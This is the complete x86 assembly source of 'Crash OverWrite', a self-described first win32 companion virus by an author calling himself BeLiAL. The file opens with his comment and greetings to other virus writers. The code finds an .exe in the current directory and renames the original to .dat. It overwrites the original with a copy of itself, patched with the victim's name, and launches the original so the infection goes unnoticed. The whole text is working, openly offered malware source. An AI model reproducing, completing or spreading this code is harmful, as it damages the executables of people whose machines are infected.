comment * Name: Crash OverWrite :-) Coder: BeLiAL This is my first win32 virus.Its only a companionvirus but it does his work very well.Its perhaps coded a bit lame but im sure nobody will care.It infects the first file in the directory and renames the victimfile to .dat .I perhaps i make it resident or infecting more file... Greetings and thanx go out to Evul,Toro,Padisah and Wallo. BeLiAL * .386 .model flat Locals Jumps Extrn FindFirstFileA :PROC Extrn FindNextFileA :PROC Extrn CreateFileA :PROC Extrn WriteFile :PROC Extrn ReadFile :PROC Extrn GlobalAlloc :PROC Extrn GlobalFree :PROC Extrn ExitProcess :PROC Extrn WinExec :PROC Extrn CopyFileA :PROC Extrn CloseHandle :PROC Extrn SetFilePointer :PROC Extrn GetFileSize :PROC .data MAX_PATH EQU 0ffh FALSE EQU 0 changeoffset EQU 094fh winsize EQU 05h FILETIME struct dwLowDateTime DWORD ? dwHighDateTime DWORD ? FILETIME ends WIN32_FIND_DATA struct dwFileAttributes DWORD ? ftCreationTime FILETIME <> ftLastAccessTime FILETIME <> ftLastWriteTime FILETIME <> nFileSizeHigh DWORD ? nFileSizeLow DWORD ? dwReserved0 DWORD ? dwReserved1 DWORD ? cFileName BYTE MAX_PATH dup(?) cAlternate BYTE 0eh dup(?) ends FindFileData WIN32_FIND_DATA <> memptr dd 0 counter1 dd 0 filehandle dd 0 filesize dd 00001000h exefile db '*.exe',0 myname db 'crashoverwrite.exe',0 dd 0 dd 0 secbuffer dd 0 dd 0 dd 0 dd 0 db '[Crash OverWrite] coded by BeLiAL' .code start: push offset FindFileData push offset exefile call FindFirstFileA already_infected: mov eax,dword ptr nFileSizeLow.FindFileData cmp eax,00001000h je reanimate mov eax,offset cFileName.FindFileData find_dot1: cmp byte ptr ds:[eax],'.' je next_step1 add eax,1 jmp find_dot1 next_step1: add eax,1 push eax mov byte ptr ds:[eax],'d' add eax,1 mov byte ptr ds:[eax],'a' add eax,1 mov byte ptr ds:[eax],'t' mov ebx,offset cFileName.FindFileData mov eax,offset secbuffer find_dot2: mov dh,byte ptr ds:[ebx] cmp edx,0 je next_step2 mov byte ptr ds:[eax],dh add ebx,1 add eax,1 jmp find_dot2 next_step2: pop eax push FALSE push offset secbuffer mov byte ptr ds:[eax],'e' add eax,1 mov byte ptr ds:[eax],'x' add eax,1 mov byte ptr ds:[eax],'e' push offset cFileName.FindFileData call CopyFileA push FALSE push offset cFileName.FindFileData push offset myname call CopyFileA open_victim: push 0 push 080h push 3h push 0h push 0h push 0c0000000h push offset FindFileData.cFileName Call CreateFileA mov filehandle,eax cmp eax,0ffffffffh je reanimate getmemory: push filesize push 0 Call GlobalAlloc ;get the memory mov edx,eax cmp eax,0 je close_file push edx copyinmemory: push 0 push offset counter1 push filesize push edx push filehandle Call ReadFile pop edx mov dword ptr memptr,edx ;for later use add edx,changeoffset mov eax,offset cFileName.FindFileData modify_victim: mov bh,byte ptr ds:[eax] mov byte ptr ds:[edx],bh cmp bh,0 je set_pointer add eax,1 add edx,1 jmp modify_victim set_pointer: push 0 push 0 push 0 push filehandle call SetFilePointer copy_to_file: push 0 push offset counter1 push filesize push memptr push filehandle call WriteFile close_file: push filehandle call CloseHandle reanimate: mov eax,offset myname find_dot3: mov bx,word ptr ds:[eax] cmp bx,'e.' je next_step3 cmp bx,'E.' je next_step3 add eax,1 jmp find_dot3 next_step3: add eax,1 mov byte ptr ds:[eax],'d' add eax,1 mov byte ptr ds:[eax],'a' add eax,1 mov byte ptr ds:[eax],'t' add eax,1 mov byte ptr ds:[eax],00h that_was_all: push winsize push offset myname call WinExec final: push 0 call ExitProcess ends end start